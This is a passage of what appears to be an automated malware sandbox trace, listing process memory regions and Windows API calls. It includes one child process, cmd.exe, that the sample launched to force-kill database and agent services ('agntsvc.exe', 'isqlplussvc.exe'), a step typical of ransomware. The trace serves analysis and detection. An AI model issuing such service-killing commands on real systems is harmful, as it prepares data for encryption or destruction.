"pagefile_0x0000000000010000" filename = "" Region: id = 2319 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2320 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2321 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2322 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2323 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2324 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2325 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2326 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2327 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2328 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2329 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2330 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2331 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2332 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2333 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2334 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2335 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2336 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2337 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2338 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2339 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2340 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2341 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2342 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2343 start_va = 0x4480000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 2344 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2345 start_va = 0x44b0000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2346 start_va = 0x44f0000 end_va = 0x4677fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 2347 start_va = 0x46a0000 end_va = 0x479ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 2348 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2349 start_va = 0x47a0000 end_va = 0x4920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047a0000" filename = "" Region: id = 2350 start_va = 0x4930000 end_va = 0x5d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004930000" filename = "" Region: id = 2351 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2352 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2353 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2354 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2355 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2356 start_va = 0x5d30000 end_va = 0x6066fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2357 start_va = 0x6070000 end_va = 0x6159fff monitored = 0 entry_point = 0x60ad650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2358 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 2359 start_va = 0x6070000 end_va = 0x614ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2360 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2361 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2362 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2363 start_va = 0x4680000 end_va = 0x4680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 2364 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2365 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2366 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2367 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2368 start_va = 0x6150000 end_va = 0x618ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006150000" filename = "" Region: id = 2369 start_va = 0x6190000 end_va = 0x61cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006190000" filename = "" Region: id = 2370 start_va = 0x61d0000 end_va = 0x620ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061d0000" filename = "" Region: id = 2371 start_va = 0x6210000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 2372 start_va = 0x6250000 end_va = 0x628ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 2373 start_va = 0x6290000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006290000" filename = "" Region: id = 2374 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2375 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2376 start_va = 0x4690000 end_va = 0x4695fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004690000" filename = "" Thread: id = 186 os_tid = 0x137c Thread: id = 187 os_tid = 0x13a4 Thread: id = 188 os_tid = 0x608 Thread: id = 189 os_tid = 0x714 Thread: id = 190 os_tid = 0x100c Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x32256000" os_pid = "0x1128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im agntsvc.exeisqlplussvc.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2379 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2380 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2381 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2382 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2383 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2384 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2385 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2386 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2387 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2388 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2389 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2390 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2391 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2392 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2393 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2394 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2395 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2396 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2397 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2398 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2399 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2400 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2401 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2402 start_va = 0x600000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2403 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2404 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2405 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2406 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2407 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2408 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2409 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2410 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2411 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2412 start_va = 0x500000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2413 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2414 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2415 start_va = 0x8e0000 end_va = 0xc16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 191 os_tid = 0x1154 [0166.095] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0166.095] __set_app_type (_Type=0x1) [0166.095] __p__fmode () returned 0x74974d6c [0166.095] __p__commode () returned 0x74975b1c [0166.096] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0166.096] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0166.096] GetCurrentThreadId () returned 0x1154 [0166.096] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1154) returned 0x78 [0166.096] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0166.096] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0166.097] SetThreadUILanguage (LangId=0x0) returned 0x409 [0166.102] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0166.102] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0166.103] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.103] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0166.103] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0166.103] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0166.103] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0166.103] GetConsoleOutputCP () returned 0x1b5 [0166.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0166.105] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0166.105] _get_osfhandle (_FileHandle=1) returned 0x13c [0166.105] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0166.105] _get_osfhandle (_FileHandle=1) returned 0x13c [0166.105] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0166.105] _get_osfhandle (_FileHandle=0) returned 0x130 [0166.106] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0166.106] GetEnvironmentStringsW () returned 0x7e7cf0* [0166.106] GetProcessHeap () returned 0x7e0000 [0166.106] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa1a) returned 0x7e8718 [0166.106] FreeEnvironmentStringsA (penv="A") returned 1 [0166.106] GetProcessHeap () returned 0x7e0000 [0166.106] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0x7e0550 [0166.106] GetEnvironmentStringsW () returned 0x7e7cf0* [0166.106] GetProcessHeap () returned 0x7e0000 [0166.106] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa1a) returned 0x7e9140 [0166.106] FreeEnvironmentStringsA (penv="A") returned 1 [0166.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0166.106] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.107] RegCloseKey (hKey=0x88) returned 0x0 [0166.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0166.107] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0166.108] RegCloseKey (hKey=0x88) returned 0x0 [0166.108] time (in: timer=0x0 | out: 